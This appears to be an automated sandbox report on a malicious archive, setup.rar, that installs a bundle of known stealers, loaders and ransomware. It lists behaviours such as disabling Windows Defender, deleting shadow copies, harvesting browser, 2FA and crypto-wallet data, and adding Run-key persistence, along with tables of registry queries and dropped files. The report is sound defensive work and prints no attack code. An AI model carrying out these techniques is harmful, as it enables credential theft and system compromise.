Analysis Overview
SHA256
1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a
Threat Level: Known bad
The file setup.rar was found to be: Known bad.
Malicious Activity Summary
NetSupport
SmokeLoader
Vidar
Glupteba
RedLine
Suspicious use of NtCreateProcessExOtherParentProcess
Socelars
Suspicious use of NtCreateUserProcessOtherParentProcess
Turns off Windows Defender SpyNet reporting
RedLine Payload
Buran
MetaSploit
Windows security bypass
Process spawned unexpected child process
Glupteba Payload
Modifies Windows Defender Real-time Protection settings
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
Deletes shadow copies
Downloads MZ/PE file
Blocklisted process makes network request
Drops file in Drivers directory
Stops running service(s)
Executes dropped EXE
Themida packer
Windows security modification
Checks BIOS information in registry
Reads local data of messenger clients
Reads user/profile data of web browsers
Loads dropped DLL
Looks up external IP address via web service
Adds Run key to start application
Checks whether UAC is enabled
Accesses 2FA software files, possible credential harvesting
Drops desktop.ini file(s)
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Enumerates system info in registry
Modifies system certificate store
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious use of UnmapMainImage
Script User-Agent
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: SetClipboardViewer
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Delays execution with timeout.exe
Runs ping.exe
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-22 20:10
Signatures
Analysis: behavioral7
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
165s
Max time network
1815s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\E3DB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\E3DB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\176.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\176.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\272F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\272F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Windows\SysWOW64\WerFault.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\272F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\E3DB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\176.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\BHjXhj_tjZzHuE3CfkTYhf1c.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\uqBqA3XcZ5sg_9EW1k6ZuGcS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E3DB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\176.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\272F.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4664 set thread context of 3672 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe |
| PID 4880 set thread context of 2672 | N/A | C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe | C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe |
| PID 1148 set thread context of 4164 | N/A | N/A | C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe |
| PID 1632 set thread context of 4996 | N/A | C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe | C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe |
| PID 2364 set thread context of 1740 | N/A | C:\Users\Admin\Documents\V1lAQxaN_FsGkrSpMea_jqZA.exe | C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-R6DA2.tmp | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-EUTHC.tmp | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-13OAG.tmp | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-HRIM6.tmp | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\is-2M8BK.tmp | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\INL Corpo Brovse\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-DEMU6.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
